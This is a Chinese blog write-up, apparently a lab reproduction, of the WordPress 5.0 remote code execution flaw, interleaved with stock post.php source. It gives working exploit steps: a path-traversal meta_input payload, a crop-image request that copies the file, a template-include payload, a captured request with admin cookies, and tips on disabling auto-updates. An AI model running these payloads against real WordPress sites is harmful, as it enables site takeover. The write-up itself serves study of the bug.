R_1v3r
R_1v3r

wordpress5.0分析和漏洞调试初试

一、WordPress源码分析

wordpress是单一入口,最初调用的是index.php

define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

index.php-> wp-blog->header.php,执行wp()

	require_once( dirname( __FILE__ ) . '/wp-load.php' );

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once( ABSPATH . WPINC . '/template-loader.php' );

—> wp-load.php

—>wp-config.php 配置数据库等

—> wp-setting.php

二、WordPress5.0漏洞调试分析

define('AUTOMATIC_UPDATER_DISABLED',true);

在登陆后台之前在wp-config.php中加入这个,要不然wp会自动更新修复Bug

(1)WordPress 5.0 RCE 详细分析

https://paper.seebug.org/822/

看到在上传图片文件后,修改信息update的时候处理的php文件为/wp-admin/post.php

POST /WordPress/wp-admin/post.php HTTP/1.1
Host: 192.168.1.38
Content-Length: 1024
Cache-Control: max-age=0
Origin: http://192.168.1.38
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.1.38/WordPress/wp-admin/post.php?post=37&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_e3ca52951c734d0cd487abb89556b35d=admin%7C1559267601%7C3e0fbRXKxUTgAvOqi1C6uyuxv9ml7vKsFOOQMxWY61f%7C209c5042ff858e675c714458adcf73706902372731d51ffd93417748d6348b23; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_e3ca52951c734d0cd487abb89556b35d=admin%7C1559267601%7C3e0fbRXKxUTgAvOqi1C6uyuxv9ml7vKsFOOQMxWY61f%7Cb58cb1615de8a8e460b252db61702533aeb2c331690ebfdf7f0f938aac4d8f19; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1559094801
Connection: close

_wpnonce=11ee4d6745&_wp_http_referer=%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=attachment&original_post_status=inherit&referredby=http%3A%2F%2F192.168.1.38%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2F192.168.1.38%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&post_ID=37&meta-box-order-nonce=907417e7f4&closedpostboxesnonce=dcc054a1b3&post_title=1&samplepermalinknonce=baeaaafb2f&excerpt=&_wp_attachment_image_alt=&content=11111111111&attachment_url=http%3A%2F%2F192.168.1.38%2FWordPress%2Fwp-content%2Fuploads%2F2019%2F05%2F1-6.jpg%23%2F..%2F..%2F..%2F..%2Fthemes%2Ftwentynineteen%2F16-e1559100927286.jpg&original_publish=Update&save=Update&advanced_view=1&comment_status=open&add_comment_nonce=5665e358d9&_ajax_fetch_list_nonce=1fd62550b6&_wp_http_referer=%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&post_name=1-3&post_author_override=1

wp-admin/post.php


/**
 * Edit post administration panel.
 *
 * Manage Post actions: post, edit, delete, etc.
 *
 * @package WordPress
 * @subpackage Administration
 */

/** WordPress Administration Bootstrap */
require_once( dirname( __FILE__ ) . '/admin.php' );

$parent_file  = 'edit.php';
$submenu_file = 'edit.php';

wp_reset_vars( array( 'action' ) );

if ( isset( $_GET['post'] ) && isset( $_POST['post_ID'] ) && (int) $_GET['post'] !== (int) $_POST['post_ID'] ) {
	wp_die( __( 'A post ID mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 );
} elseif ( isset( $_GET['post'] ) ) {
	$post_id = $post_ID = (int) $_GET['post'];
} elseif ( isset( $_POST['post_ID'] ) ) {
	$post_id = $post_ID = (int) $_POST['post_ID'];
} else {
	$post_id = $post_ID = 0;
}

/**
 * @global string  $post_type
 * @global object  $post_type_object
 * @global WP_Post $post
 */
global $post_type, $post_type_object, $post;

if ( $post_id ) {
	$post = get_post( $post_id );
}

if ( $post ) {
	$post_type        = $post->post_type;
	$post_type_object = get_post_type_object( $post_type );
}

if ( isset( $_POST['post_type'] ) && $post && $post_type !== $_POST['post_type'] ) {
	wp_die( __( 'A post type mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 );
}

if ( isset( $_POST['deletepost'] ) ) {
	$action = 'delete';
} elseif ( isset( $_POST['wp-preview'] ) && 'dopreview' == $_POST['wp-preview'] ) {
	$action = 'preview';
}

$sendback = wp_get_referer();
if ( ! $sendback ||
	 strpos( $sendback, 'post.php' ) !== false ||
	 strpos( $sendback, 'post-new.php' ) !== false ) {
	if ( 'attachment' == $post_type ) {
		$sendback = admin_url( 'upload.php' );
	} else {
		$sendback = admin_url( 'edit.php' );
		if ( ! empty( $post_type ) ) {
			$sendback = add_query_arg( 'post_type', $post_type, $sendback );
		}
	}
} else {
	$sendback = remove_query_arg( array( 'trashed', 'untrashed', 'deleted', 'ids' ), $sendback );
}

switch ( $action ) {
	case 'post-quickdraft-save':
		// Check nonce and capabilities
		$nonce     = $_REQUEST['_wpnonce'];
		$error_msg = false;

		// For output of the quickdraft dashboard widget
		require_once ABSPATH . 'wp-admin/includes/dashboard.php';

		if ( ! wp_verify_nonce( $nonce, 'add-post' ) ) {
			$error_msg = __( 'Unable to submit this form, please refresh and try again.' );
		}

		if ( ! current_user_can( get_post_type_object( 'post' )->cap->create_posts ) ) {
			exit;
		}

		if ( $error_msg ) {
			return wp_dashboard_quick_press( $error_msg );
		}

		$post = get_post( $_REQUEST['post_ID'] );
		check_admin_referer( 'add-' . $post->post_type );

		$_POST['comment_status'] = get_default_comment_status( $post->post_type );
		$_POST['ping_status']    = get_default_comment_status( $post->post_type, 'pingback' );

		edit_post();
		wp_dashboard_quick_press();
		exit;

	case 'postajaxpost':
	case 'post':
		check_admin_referer( 'add-' . $post_type );
		$post_id = 'postajaxpost' == $action ? edit_post() : write_post();
		redirect_post( $post_id );
		exit();

	case 'edit':
		$editing = true;

		if ( empty( $post_id ) ) {
			wp_redirect( admin_url( 'post.php' ) );
			exit();
		}

		if ( ! $post ) {
			wp_die( __( 'You attempted to edit an item that doesn’t exist. Perhaps it was deleted?' ) );
		}

		if ( ! $post_type_object ) {
			wp_die( __( 'Invalid post type.' ) );
		}

		if ( ! in_array( $typenow, get_post_types( array( 'show_ui' => true ) ) ) ) {
			wp_die( __( 'Sorry, you are not allowed to edit posts in this post type.' ) );
		}

		if ( ! current_user_can( 'edit_post', $post_id ) ) {
			wp_die( __( 'Sorry, you are not allowed to edit this item.' ) );
		}

		if ( 'trash' == $post->post_status ) {
			wp_die( __( 'You can’t edit this item because it is in the Trash. Please restore it and try again.' ) );
		}

		if ( ! empty( $_GET['get-post-lock'] ) ) {
			check_admin_referer( 'lock-post_' . $post_id );
			wp_set_post_lock( $post_id );
			wp_redirect( get_edit_post_link( $post_id, 'url' ) );
			exit();
		}

		$post_type = $post->post_type;
		if ( 'post' == $post_type ) {
			$parent_file   = 'edit.php';
			$submenu_file  = 'edit.php';
			$post_new_file = 'post-new.php';
		} elseif ( 'attachment' == $post_type ) {
			$parent_file   = 'upload.php';
			$submenu_file  = 'upload.php';
			$post_new_file = 'media-new.php';
		} else {
			if ( isset( $post_type_object ) && $post_type_object->show_in_menu && $post_type_object->show_in_menu !== true ) {
				$parent_file = $post_type_object->show_in_menu;
			} else {
				$parent_file = "edit.php?post_type=$post_type";
			}
			$submenu_file  = "edit.php?post_type=$post_type";
			$post_new_file = "post-new.php?post_type=$post_type";
		}

		$title = $post_type_object->labels->edit_item;

		/**
		 * Allows replacement of the editor.
		 *
		 * @since 4.9.0
		 *
		 * @param boolean      Whether to replace the editor. Default false.
		 * @param object $post Post object.
		 */
		if ( apply_filters( 'replace_editor', false, $post ) === true ) {
			break;
		}

		if ( use_block_editor_for_post( $post ) ) {
			include( ABSPATH . 'wp-admin/edit-form-blocks.php' );
			break;
		}

		if ( ! wp_check_post_lock( $post->ID ) ) {
			$active_post_lock = wp_set_post_lock( $post->ID );

			if ( 'attachment' !== $post_type ) {
				wp_enqueue_script( 'autosave' );
			}
		}

		$post = get_post( $post_id, OBJECT, 'edit' );

		if ( post_type_supports( $post_type, 'comments' ) ) {
			wp_enqueue_script( 'admin-comments' );
			enqueue_comment_hotkeys_js();
		}

		include( ABSPATH . 'wp-admin/edit-form-advanced.php' );

		break;

	case 'editattachment':
		check_admin_referer( 'update-post_' . $post_id );

		// Don't let these be changed
		unset( $_POST['guid'] );
		$_POST['post_type'] = 'attachment';

		// Update the thumbnail filename
		$newmeta          = wp_get_attachment_metadata( $post_id, true );
		$newmeta['thumb'] = wp_basename( $_POST['thumb'] );

		wp_update_attachment_metadata( $post_id, $newmeta );

		// Intentional fall-through to trigger the edit_post() call.
	case 'editpost':
		check_admin_referer( 'update-post_' . $post_id );

		$post_id = edit_post();

		// Session cookie flag that the post was saved
		if ( isset( $_COOKIE['wp-saving-post'] ) && $_COOKIE['wp-saving-post'] === $post_id . '-check' ) {
			setcookie( 'wp-saving-post', $post_id . '-saved', time() + DAY_IN_SECONDS, ADMIN_COOKIE_PATH, COOKIE_DOMAIN, is_ssl() );
		}

		redirect_post( $post_id ); // Send user on their way while we keep working

		exit();

	case 'trash':
		check_admin_referer( 'trash-post_' . $post_id );

		if ( ! $post ) {
			wp_die( __( 'The item you are trying to move to the Trash no longer exists.' ) );
		}

		if ( ! $post_type_object ) {
			wp_die( __( 'Invalid post type.' ) );
		}

		if ( ! current_user_can( 'delete_post', $post_id ) ) {
			wp_die( __( 'Sorry, you are not allowed to move this item to the Trash.' ) );
		}

		if ( $user_id = wp_check_post_lock( $post_id ) ) {
			$user = get_userdata( $user_id );
			wp_die( sprintf( __( 'You cannot move this item to the Trash. %s is currently editing.' ), $user->display_name ) );
		}

		if ( ! wp_trash_post( $post_id ) ) {
			wp_die( __( 'Error in moving to Trash.' ) );
		}

		wp_redirect(
			add_query_arg(
				array(
					'trashed' => 1,
					'ids'     => $post_id,
				),
				$sendback
			)
		);
		exit();

	case 'untrash':
		check_admin_referer( 'untrash-post_' . $post_id );

		if ( ! $post ) {
			wp_die( __( 'The item you are trying to restore from the Trash no longer exists.' ) );
		}

		if ( ! $post_type_object ) {
			wp_die( __( 'Invalid post type.' ) );
		}

		if ( ! current_user_can( 'delete_post', $post_id ) ) {
			wp_die( __( 'Sorry, you are not allowed to restore this item from the Trash.' ) );
		}

		if ( ! wp_untrash_post( $post_id ) ) {
			wp_die( __( 'Error in restoring from Trash.' ) );
		}

		wp_redirect( add_query_arg( 'untrashed', 1, $sendback ) );
		exit();

	case 'delete':
		check_admin_referer( 'delete-post_' . $post_id );

		if ( ! $post ) {
			wp_die( __( 'This item has already been deleted.' ) );
		}

		if ( ! $post_type_object ) {
			wp_die( __( 'Invalid post type.' ) );
		}

		if ( ! current_user_can( 'delete_post', $post_id ) ) {
			wp_die( __( 'Sorry, you are not allowed to delete this item.' ) );
		}

		if ( $post->post_type == 'attachment' ) {
			$force = ( ! MEDIA_TRASH );
			if ( ! wp_delete_attachment( $post_id, $force ) ) {
				wp_die( __( 'Error in deleting.' ) );
			}
		} else {
			if ( ! wp_delete_post( $post_id, true ) ) {
				wp_die( __( 'Error in deleting.' ) );
			}
		}

		wp_redirect( add_query_arg( 'deleted', 1, $sendback ) );
		exit();

	case 'preview':
		check_admin_referer( 'update-post_' . $post_id );

		$url = post_preview();

		wp_redirect( $url );
		exit();

	case 'toggle-custom-fields':
		check_admin_referer( 'toggle-custom-fields' );

		$current_user_id = get_current_user_id();
		if ( $current_user_id ) {
			$enable_custom_fields = (bool) get_user_meta( $current_user_id, 'enable_custom_fields', true );
			update_user_meta( $current_user_id, 'enable_custom_fields', ! $enable_custom_fields );
		}

		wp_safe_redirect( wp_get_referer() );
		exit();

	default:
		/**
		 * Fires for a given custom post action request.
		 *
		 * The dynamic portion of the hook name, `$action`, refers to the custom post action.
		 *
		 * @since 4.6.0
		 *
		 * @param int $post_id Post ID sent with the request.
		 */
		do_action( "post_action_{$action}", $post_id );

		wp_redirect( admin_url( 'edit.php' ) );
		exit();
} // end switch
include( ABSPATH . 'wp-admin/admin-footer.php' );

在admin.php中 进行数据库更新?

includes\post.php

include payload

post_title=Thisis+test&post_name=thisis-testssssssssssaaaaaa&mm=05&jj=29&aa=2019&hh=14&mn=12&ss=27&post_author=1&post_password=&post_category%5B%5D=0&post_category%5B%5D=1&tax_input%5Bpost_tag%5D=&comment_status=open&ping_status=open&_status=publish&_inline_edit=f5199c6225&post_view=list&screen=edit-post&action=inline-save&post_type=post&post_ID=11&edit_date=true&post_status=all&meta_input[_wp_page_template]=cropped-11111.jpg

在复现的过程中要注意的点

php7遇到文件路径的时候会检查某个目录是否存在,如果不存在则停止

所以在利用目录穿越漏洞的时候要在uploads下创建对应的目录

&meta_input[_wp_attached_file]=2019/02/2-4.jpg#/../../../../themes/twentynineteen/32.jpg

就是这个payload

具体操作如下:

先利用update截包修改文件名如下:&meta_input[_wp_attached_file]=2019/02/2-4.jpg#/a.jpg

然后再利用手动截图保存的功能,生成2-4.jpg#这个目录

然后再利用完整的payload的将目录穿越的文件名修改为

&meta_input[_wp_attached_file]=2019/02/2-4.jpg#/../../../../themes/twentynineteen/32.jpg

继而,进行手动截图,加载目录穿越的payload

action=crop-image&_ajax_nonce=8c2f0c9e6b&id=74&cropDetails[x1]=10&cropDetails[y1]=10&cropDetails[width]=10&cropDetails[height]=10&cropDetails[dst_width]=100&cropDetails[dst_height]=100

这个时候发现图片已经拷贝过去了

在利用文件包含的时候需要注意的是,截到包以后,直接在Intercept这个里面Forward,否则不成功

这里可以加载模板的可以是media里上传一个test.txt也可以是在post中传一篇文章,均测试通过

&meta_input[_wp_page_template]=cropped-32.jpg

调试代码跟不下去了,phpstorm总是跳来跳去的,不知道怎么回事,要是有大神可以指导一下如何调试,我是利用phpstrom+xdebug+firefox+burpsuit,加断点调试,可是进行到图片信息更新的时候,phpstrom就会乱跳。。。先贴上分析链接吧

https://paper.seebug.org/825/

你可能感兴趣的:(web攻防)

  • XSS四-WEB攻防-XSS跨站&CSP策略&HttpOnly属性&Filter过滤器&标签闭合&事件触发 爱敲键盘的pig 前端xss网络安全
    演示案例:XSS跨站-安全防御-CSPXSS跨站-安全防御-HttpOnlyXSS跨站-安全防御-XSSFilter1.CSP(Content Security Policy 内容安全策略)内容安全策略是一种可信白名单机制,来限制网站中是否可以包含某来源内容。该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单,它的实现和执行全部由浏览器完成,开发者只需提供配置。禁止加载外域代码,防
  • 44、WEB攻防——通用漏洞&RCE&代码执行&多层面检测利用 PT_silver 小迪安全网络
    文章目录RCE分类:REC代码执行:引用脚本代码解析执行。例如,eval('phpinfo();)以php脚本解析'phpinfo();。RCE命令执行:脚本调用操作系统命令。例如,system('ver'),命令执行能执行系统命令。RCE漏洞对象:WEB源码&中间件&其他环境。漏洞函数:#phpeval()、assert()、preg_replace()、call_user_func()、cal
  • 43、WEB攻防——通用漏洞&任意文件下载&删除重装&敏读取&黑白审计 PT_silver 小迪安全网络
    文章目录有关文件方面的漏洞:文件上传、文件包含和文件下载。文件读取:基本和文件下载利用类似;文件下载:利用下载获取源码或数据库配置文件及系统敏感文件为后续出思路。正常情况下,文件下载不能给一个路径就下,需要有路径过滤。黑盒测试主要是看是否允许任意文件下载。文件下载时,URL有两种情况(以下载www.xiaodi18.com/soft/1.zip为例):直链下载,www.xiaodi18.com/s
  • 42、WEB攻防——通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计 PT_silver 小迪安全前端算法
    文章目录文件包含文件包含原理攻击思路文件包含分类sessionPHP伪协议进行文件包含文件包含文件包含原理文件包含其实就是引用,相当于C语言中的include。文件包含漏洞常出现于php脚本中,当include($file)中的$file变量用户可控,就造成了文件包含漏洞。**注意被包含的文件中只要存在php代码,就可以被php解释器解析,不受文件后缀名的影响。**例如?file=1.txt,1.
  • WEB攻防-XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架 SuperherRo #WEB安全篇xssbeefcookie获取flash钓鱼XSSReceiver
    1、XSS跨站-攻击利用-凭据盗取2、XSS跨站-攻击利用-数据提交3、XSS跨站-攻击利用-网络钓鱼4、XSS跨站-攻击利用-溯源综合漏洞原理:接受输入数据,输出显示数据后解析执行基础类型:反射(非持续),存储(持续),DOM-BASE拓展类型:jquery,mxss,uxss,pdfxss,flashxss,上传xss等常用标签事件及绕过总结:https://www.freebuf.com/a
  • day38WEB攻防-通用漏洞&XSS跨站&绕过修复&http_only&CSP&标签符号 aozhan001 小迪安全-2022年xss前端
    本章知识点:1、XSS跨站-过滤绕过-便签&语句&符号等2、XSS跨站-修复方案-CSP&函数&http_only等配套资源(百度网盘)链接:https://pan.baidu.com/s/12mLsvmU22dxueyAG0aqUhw?pwd=6oa3提取码:6oa3XSS绕过-CTFSHOW-316到331关卡绕过WPxss绕过总结:https://xz.aliyun.com/t/406731
  • day37WEB攻防-通用漏洞&XSS&跨站&权限维持&钓鱼捆绑&浏览器漏洞 aozhan001 小迪安全-2022年xss安全web安全
    目录XSS-后台植入Cookie&表单劫持(权限维持)案例演示XSS-Flash钓鱼配合MSF捆绑上线1、生成后门2、下载官方文件-保证安装正常3、压缩捆绑文件-解压提取运行4、MSF配置监听状态5、诱使受害者访问URL-语言要适当XSS-浏览器网马配合MSF访问上线1、配置MSF生成URL2、诱使受害者访问URL-语言要适当本章知识点:1、XSS跨站-另类攻击手法分类2、XSS跨站-权限维持&钓
  • day36WEB攻防-通用漏洞&XSS 跨站&MXSS&UXSS&FlashXSS&PDFXSS aozhan001 小迪安全-2022年xss安全web安全
    本章知识点不是很重要,涉及到的漏洞也不是常见的,所以没有过多的阐述。配套资源(百度网盘)链接:https://pan.baidu.com/s/1xTp14wE-mqEr7EHU9nSCrg?pwd=nlsg提取码:nlsgMXSS突变型XSS漏洞MXSS参考链接:https://www.fooying.com/the-art-of-xss-1-introduction/UXSS-Edge&CVE-
  • 41、WEB攻防——通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计 PT_silver 小迪安全前端xml网络
    文章目录XXE原理&探针&利用XXE读取文件XXE带外测试XXE实体引用XXE挖掘XXE修复参考资料:CTFXXEXXE原理&探针&利用XXE用到的重点知识是XML,XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE(XMLExternalEntityInjectio
  • 39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用 PT_silver 小迪安全前端csrf网络
    文章目录CSRFCSRF原理CSRF安全问题黑盒怎么判断SSRFSSRF原理SSRF黑盒可能出现的地方有SSRF,可以做什么事儿?SSRF漏洞挖掘CSRFCSRF原理测试CSRF漏洞的工具:CSRFTesterCSRFTester设置代理,会抓取新建管理员时向服务器发送的数据包,然后用抓取的数据包构造HTML页面。注意发送注册信息的形式(表单?IMG?)CSRF利用流程:获取目标的触发数据包;利用
  • 40、WEB攻防——通用漏洞&CSRF&SSRF&代码审计&同源策略&加载函数 PT_silver 小迪安全前端csrf
    文章目录CSRFSSRF审计思路CSRF如何对CSRF进行测试?尝试添加管理员为例抓取添加管理员的用户名和密码的数据包,形成html文件,并放到公网服务器上。登录后台的状态下访问刚刚那个文件,CSRF攻击完成。CSRF绕过:针对来源检测,可以:(1)伪造referer,需要在html代码数据包文件中固定http-referer;(2)尝试在网站任何可上传地方,上传数据包文件,取得当前同域名访问地址
  • 【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训笔记(WEB攻防35-40-XSS、CSRF、SSRF) 清歌secure 前端安全网络
    第35天WEB攻防-通用漏洞&XSS跨站&反射&存储&DOM&盲打&劫持知识点:1、XSS跨站-原理&攻击&分类等2、XSS跨站-反射型&存储型&DOM型等3、XSS跨站攻击手法&劫持&恣取凭据等4、XSS跨站-攻击项目&XSS平台&Beef-XSS1、原理指改击者利用网程序对用户输入过不足,端入可以量示在页面上对其他用尸道成影响的HTML代码,从而盗取用户资料、利用用户具份进行某种动或者对访问者
  • 38、WEB攻防——通用漏洞&XSS跨站&绕过修复&http_only&CSP&标签符号 PT_silver 小迪安全前端xsshttp
    文章目录一、Ctfshowweb316——未做任何过滤(反射型)web317-319——过滤特定标签(反射型)web320——过滤空格(反射型)web328——注册插入JS(存储型)web329——验证失效(存储型)web330——XSS+CSRF(GET型)web331——XSS+CSRF(POST型)二、XSS防御一、CtfshowXSS总结web316——未做任何过滤(反射型)documen
  • 37、WEB攻防——通用漏洞&XSS跨站&权限维持&捆绑钓鱼&浏览器漏洞 PT_silver 小迪安全前端xss
    文章目录XSS——后台植入Cookie&表单劫持(获取明文密码)XSS——Flash钓鱼配合MSF捆绑上线XSS——浏览器网马配合MSF访问上线要想获取有效的cookie,需要:1、网站本身采用cookie进行验证;2、网站未做http-only等的防御手段。XSS——后台植入Cookie&表单劫持(获取明文密码)后台植入XSS获取Cookie,主要是在登录成功的文件中写入XSS代码,一旦有人登录
  • 36、WEB攻防——通用漏洞&XSS跨站&MXSS&UXSS&FlashXSS&PDFXSS PT_silver 小迪安全前端xss
    文章目录MXSSUXSSFlashXSSPDFXSS跨站的艺术-XSS入门与介绍UTF-7XSS、MHTMLXSS、CSSXSS、VBScriptXSS已经过时,基本上不会出现。MXSS简单来说,就是你往前端页面插入payload,但是前端有些防御策略会将payload编码,导致payload不能被正常执行。如果将插入payload的链接用低版本QQ转发给别人,因为QQ有自动预览功能,重新优化原网
  • 第31天:WEB攻防-通用漏洞&文件上传&js验证&mime&user.ini&语言特性 My Year 2019 安全web安全
    1,什么是文件上传漏洞?上传文件时,未对上传的文件进行严格的验证和过滤,造成用户可以上传可执行脚本的漏洞叫文件上传漏洞。2,文件上传漏洞有哪些危害?可以通过文件上传漏洞上传网站后门,获取网站权限3,文件上传的防御1、文件上传的目录设置为不可执行2、判断文件类型(使用白名单的方式,对于图片的处理,可以使用压缩函数或resize函数,在处理图片的同时破坏图片中可能包含的HTML代码)3、使用随机数改写
  • WEB攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀 @墨竹 前端安全php
    目录知识点详细点文件二次渲染php删除规则例题CTF-Web入门-162CTF-Web入门-163CTF-Web入门-164CTF-Web入门-165CTF-Web入门-166CTF-Web入门-167CTF-Web入门-168CTF-Web入门-169-170知识点1、文件上传-二次渲染2、文件上传-简单免杀变异3、文件上传-.htaccess妙用4、文件上传-PHP语言特性详细点1、检测层面:
  • day29WEB攻防-通用漏洞&SQL注入&盲注&延时&布尔&报错&增删改查 aozhan001 小迪安全-2022年sql数据库
    目录一,盲注-时间&布尔&报错型1.基于布尔的SQL盲注-逻辑判断1.1布尔类型盲注判断1.2布尔型盲注注入流程1.2.1、在参数后添加引号尝试报错,并用and1=1#和and1=2#测试报错1.2.2、判断数据库名的长度1.2.3、猜解数据库名1.2.4、判断数据库表名1.2.5、判断数据库字段名1.2.6、取数据1.3案例演示-BupSuite2.基于时间的SQL盲注-延时判断2.1时间类型盲
  • day30WEB攻防-通用漏洞&SQL注入&二次注入&堆叠注入 aozhan001 小迪安全-2022年sql数据库
    目录一,二次注入1.二次注入原理2.二次注入代码分析3.二次注入案例演示二,堆叠注入1.堆叠注入原理2.堆叠注入条件3.堆叠注入案例演示一,二次注入1.二次注入原理二次注入主要分为两步第一步:插入恶意数据:第一次进行数据库数据插入的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身包含恶意内容。第二步:引用恶意数据:在将数据存入到数据库中之后,开发者就认为数
  • day31WEB攻防-通用漏洞&文件上传&js验证&mime&user.ini&语言特性 aozhan001 小迪安全-2022年前端
    目录1.JS验证2.JS验证+MIME3.JS验证+.user.ini4.JS验证+.user.ini+短标签(ctfshow154,155关)5.JS验证+.user.ini+短标签+过滤[]6.JS验证+.user.ini+短标签+加过滤+文件头有关文件上传的知识1.为什么文件上传存在漏洞上传文件时,如果服务瑞代码未对客户端上传的文件进行严格的验证和过滤,就容易造成可以上传任意文件的情况,包括
  • day26WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等 aozhan001 小迪安全-2022年sqloracle数据库
    目录一,数据库注入-联合猜解-Oracle&Mongodb案例:二,SQLMAP的讲解和使用1.关于SQLmap的几个知识点1.1什么是SQLMAP?1.2它支持哪些数据库的注入?1.3它支持哪些SQL注入模式?1.4它支持哪些其他不一样的功能?1.5使用SQLMAP一般注入流程分析?2.SQLMAP的下载安装3.SQLMAP的使用4.基于MYSQL数据库的简单案例4.1在sqlmap目录下打开c
  • day27WEB攻防-通用漏洞&SQL注入&常见SQL注入类型&Tamper脚本的使用 aozhan001 小迪安全-2022年sql数据库
    目录一,常见SQL注入类型1.数字型2.字符型3.搜索型4.编码型:数据以编码值传递5.格式型:JSON6.字符转义处理防护-宽字节注入二,Tamper脚本的使用Tamper作用:脚本使用格式常用tamper脚本案例演示一,常见SQL注入类型1.数字型判断方法:?id=1and1=1?id=1and1=21=1时条件成立返回id=1的数据,1=2时条件不成立返回空,由此判断为数字注入。如果为字符型
  • WEB攻防-通用漏洞&文件上传&js验证&mime&user.ini&语言特性 @墨竹 前端javascriptphp
    目录知识点1、文件上传-前端验证2、文件上传-黑白名单3、文件上传-user.ini妙用4、文件上传-PHP语言特性详细介绍1、检测层面:前端,后端等2、检测内容:文件头,完整性,二次渲染等3、检测后缀:黑名单,白名单,MIME检测等4、绕过技巧5、前置知识案例演示-CTFSHOW-文件上传-151到161关卡CTF-文件上传-151CTF-文件上传-152CTF-文件上传-153CTF-文件上传
  • 第23天:WEB攻防-Python考点&CTF与CMS-SSTI模版注入&PYC反编译 My Year 2019 flaskpython后端
    目录PYC文件反编译SSTIflask模板注入BUUCTF-shrine靶场题目SSTI考点-CMS源码-MACCMS_V8.X(苹果cms)执行PYC文件反编译介绍:pyc文件是py文件编译后生成的字节码文件(bytecode)。pyc文件经过python解释器最终会生成机器码运行。所以pyc文件是可以跨平台部署的,类似Java的.class文件。一般py文件改变后,都会重新生成pyc文件。但在
  • Web攻防--JAVAWEB项目&JWT身份攻击&组件安全&Python考点&CTF与CMS-SSTI模版注入&PYC反编译 LaPluie985 安全web安全javapython网络安全
    知识点:1、JavaWeb常见安全及代码逻辑2、目录遍历&身份验证&逻辑&JWT3、访问控制&安全组件&越权&三方组件案例演示:JavaWeb-WebGoat8靶场搭建使用安全问题-目录遍历&身份认证-JWT攻击安全问题-访问控制&安全组件-第三方组件环境下载地址:GitHub-WebGoat/WebGoat:WebGoatisadeliberatelyinsecureapplication(安装
  • 第二十三天:WEB攻防-WEB攻防-Python考点&CTF与CMS-SSTI模版注入&PYC反编译 新奇八 网络安全安全网络安全phppython
    -python的pyc文件pyc文件是py文件编译后生成的字节码文件(bytecode)。pyc文件经过python解释器最终会生成机器码运行。所以pyc文件是可以跨平台部署的,类似Java的.class文件。一般py文件改变后,都会重新生成pyc文件。当然,生成的pyc文件也是可以通过网上一些在线平台反编译出来从而获得源码的反编译平台:1.https://tool.lu/pyc/2.http:/
  • 35、WEB攻防——通用漏洞&XSS跨站&反射&存储&DOM&盲打&劫持 PT_silver 小迪安全前端xss
    文章目录XSS产生于前端的漏洞,常产生于:XSS分类:反射型(非持久型)存储型(持久型),攻击代码被写入数据库中。常见于:写日志、留言、评论的地方DOM型DOM型XSS与反射型XSS、存储型XSS的最大区别在于:DOM型XSS前端的数据是传输给前端JS代码进行处理,而反射型XSS、存储型XSS是后端PHP代码对前端数据进行处理。mXSS(突变型XSS)UXSS(通用型XSS)FlashXSSUTF
  • V2022全栈培训笔记(WEB攻防46-WEB攻防-通用漏洞&PHP反序列化&原生类&漏洞绕过&公私有属性) 清歌secure 笔记php网络安全安全
    第46天WEB攻防-通用漏洞&PHP反序列化&原生类&漏洞绕过&公私有属性知识点:1、反序列化魔术方法全解2、反序列化变量属性全解3、反序列化魔术方法原生类4、反序列化语言特性漏洞绕过~其他魔术方法共有&私有&保护语言模式方法漏洞~原生类获取利用配合#反序列化利用大概分类三类-魔术方法的调用逻辑如触发条件-语言原生类的调用逻辑如SoapClient-语言自身的安全缺陷如CVE-2016-7124#
  • 34、WEB攻防——通用漏洞&文件上传&黑白盒审计&逻辑&中间件&外部引用 PT_silver 小迪安全php
    文章目录黑盒:个人用户中心是否存在文件上传功能;后台管理系统是否存在文件上传功能;字典目录扫描探测文件上传地址;字典目录扫描探测编辑器目录地址。网站调用常见的编辑器,编辑器地址都是默认的。白盒:看三点,中间件、编辑器、功能代码中间件直接看语言环境常见搭配编辑器直接看目录机构或搜索关键字功能代码直接看源码应用或搜索关键字在白盒中,根据数据包的请求地址来看后端哪个文件处理该请求。某个目录不允许执行ph
  • 33、WEB攻防——通用漏洞&文件上传&中间件解析漏洞&编辑器安全 PT_silver 小迪安全前端中间件编辑器
    文章目录一、中间件文件解析——IIS&Apache&Nginx1、IIS2、Apache3、Nginx二、web编辑器一、中间件文件解析——IIS&Apache&Nginx1、IISIIS爆过漏洞的版本:IIS6.0(windowsserver2003)、IIS7.0和IIS7.5(windowsserver2008)IIS6.0解析漏洞:文件名:x.asp;x.jpg,jpg的文件后缀名,但是会
  • Spring的注解积累 yijiesuifeng spring注解
